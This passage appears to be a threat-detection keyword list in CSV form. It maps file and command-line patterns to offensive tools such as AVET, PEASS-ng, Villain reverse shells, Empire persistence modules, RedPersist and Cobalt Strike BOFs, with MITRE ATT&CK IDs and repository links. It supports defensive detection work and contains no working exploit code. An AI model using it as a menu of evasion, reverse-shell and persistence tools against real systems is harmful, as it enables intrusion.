-*pe2shc.exe *,offensive_tool_keyword,pe_to_shellcode,Converts PE into a shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/hasherezade/pe_to_shellcode,1,0,N/A,N/A,10,2007,402,2023-08-15T14:42:12Z,2018-08-19T22:57:07Z
-*pe2shc.exe*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. 
For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*pe2shc_*.zip*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*Pe2Shellcode.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z
-*PEASS-ng-master*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z
-*peCloak*,offensive_tool_keyword,peCloak,peCloak.py (beta) - A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool,T1027.002 - T1059.003 - T1140 - T1562.001,TA0002 - TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/v-p-b/peCloakCapstone/blob/master/peCloak.py,1,0,N/A,N/A,1,97,39,2016-03-21T23:38:15Z,2015-08-19T14:46:50Z
-*peinject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*peinjector.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*PELoader/PeLoader.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z
-*pem2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*Pennyw0rth/NetExec*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-*-pentest*,offensive_tool_keyword,_,pentest keyword detection. detect potential pentesters using this keyword in file name. 
repository or command line,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*PentestBox*,offensive_tool_keyword,pentestbox,PentestBox is an Opensource PreConfigured Portable Penetration Testing Environment for the Windows Operating System,T1043 - T1059 - T1078 - T1082 - T1083 - T1092 - T1095 - T1102 - T1123 - T1132 - T1134 - T1135 - T1140 - T1204 - T1218 - T1219 - T1222 - T1247 - T1496 - T1497 - T1543 - T1552 - T1553 - T1574 - T1583 - T1588 - T1592 - T1596 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://pentestbox.org/fr/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*PENTESTING-BIBLE*,offensive_tool_keyword,PENTESTING-BIBLE,pentest documentation - Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY.,T1583 - T1598 - T1596,TA0001 - TA0008 - TA0043,N/A,N/A,Exploitation tools,https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE,1,1,N/A,N/A,10,12394,2312,2023-04-03T07:40:28Z,2019-06-28T11:26:57Z
-*pentest-machine*,offensive_tool_keyword,pentest-machine,Automates some pentesting work via an nmap XML file. As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/. Runs fast-returning commands first. 
Please send me protocols/commands/options that you would like to see included.,T1583 - T1584 - T1580 - T1582 - T1574,TA0002 - TA0001 - TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/DanMcInerney/pentest-machine,1,1,N/A,N/A,4,315,106,2018-09-07T20:01:41Z,2015-02-26T23:57:21Z
-*pentestmonkey*,offensive_tool_keyword,Github Username,github repo name - privileges exploitation and offensive tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/pentestmonkey,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*PE-Obfuscator.exe*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,1,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z
-*PE-Obfuscator.git*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,1,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z
-*PE-Obfuscator-main*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,1,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z
-*Pepitoh*VBad*,offensive_tool_keyword,vbad,VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.,T1564 - T1117 - T1204 - T1070,TA0002 - TA0008 - TA0011,N/A,N/A,Defense Evasion,https://github.com/Pepitoh/Vbad,1,1,N/A,N/A,6,511,134,2017-10-15T12:56:18Z,2016-03-09T12:36:04Z
-*perfdata.portswigger.net*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. 
and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*PerfExec.sln*,offensive_tool_keyword,PerfExec,PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.,T1055.001 - T1059.001 - T1059.003 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/PerfExec,1,0,N/A,7,1,73,8,2023-08-02T20:53:24Z,2023-07-11T16:43:47Z
-*PerfExec-main.zip*,offensive_tool_keyword,PerfExec,PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.,T1055.001 - T1059.001 - T1059.003 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/PerfExec,1,0,N/A,7,1,73,8,2023-08-02T20:53:24Z,2023-07-11T16:43:47Z
-*Perform password spraying for all active users on a domain*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,0,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z
-*Performing recursive ShadowSpray attack*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z
-*perl nikto.pl -h*,offensive_tool_keyword,nikto,Nikto web scanner tool,T1210.001 - T1190 - T1046 - T1222,TA0007 - TA0002 - TA0001,N/A,N/A,Web 
Attacks,https://github.com/sullo/nikto,1,0,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z
-*perl_no_sh_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z
-*perl-reverse-shell.*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z
-*PersAutorun.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*PersCLRInstall.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*persist exceladdin*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z
-*persist 
logonscript*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z
-*persist run *hkcu*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z
-*persist run *hklm*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z
-*persist runkey*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z
-*persist spe *.exe*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z
-*Persist.cna*,offensive_tool_keyword,AggressorScripts-1,persistence script for cobaltstrike. 
Persistence Aggressor Scripts for Cobalt Strike 3.0+,T1074 - T1070 - T1105 - T1558,TA0007 - TA0003 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/Cn33liz/AggressorScripts-1/tree/master/Persistence,1,1,N/A,N/A,1,1,1,2018-06-24T16:27:57Z,2019-10-18T12:56:35Z
-*Persist\autorun.cs*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z
-*Persist\eventviewer.cs*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z
-*Persist\powershell.cs*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z
-*Persist\screensaver.cs*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z
-*Persist\startup.cs*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z
-*Persist\winlogon.cs*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z
-*PersistBOF.cna*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z
-*Persistence.cpp*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,1,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z
-*Persistence.exe*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,1,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z
-*Persistence.psm1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Persistence.psm1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1117,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Persistence.psm1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*Persistence/InstallWMI*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z
-*Persistence_AccountManipulation_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*Persistence_Guard_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*Persistence_LogonScripts_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the 
process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*Persistence_NewService_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*Persistence_OfficeApplicationStartup_OfficeTest.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*Persistence_Other_WindowsLibraryMs.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Persistence_RegistryRunKeys_SharpHide.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Persistence_RegistryRunKeys_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Persistence_ScheduledTask_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Persistence_WinlogonHelperDLL_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which 
